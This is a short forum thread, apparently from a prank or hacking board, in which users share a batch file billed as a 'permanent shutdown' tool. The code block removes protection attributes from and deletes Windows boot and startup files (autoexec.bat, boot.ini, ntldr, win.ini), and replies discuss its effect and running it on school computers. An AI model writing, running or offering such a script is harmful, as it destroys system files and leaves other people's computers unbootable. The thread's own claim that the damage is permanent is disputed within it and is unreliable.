Here is a tut on how to make a permanetly shutdown batch file works tryed it

Don't mean to sound like an ass but I don't believe win.ini and autoexec.bat are needed to load Windows.

Annnddd, boot.ini is a simple text document that can easily be re-written, and you can copy ntldr from another computer or off of your Win disk. So technically it's just a temporary shutdown batch..

🤫
Video wont work..

Now it works!👍
why didnt you just post the code in first time? and I am sure I have seen this is some other post...
Code
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
And I think it will still ask me if I want to delete the file :P
Okey cool but is it realy that smart to do it at school comps :P cause if they caught you youll haft to pay em :P
And the code was OK :P
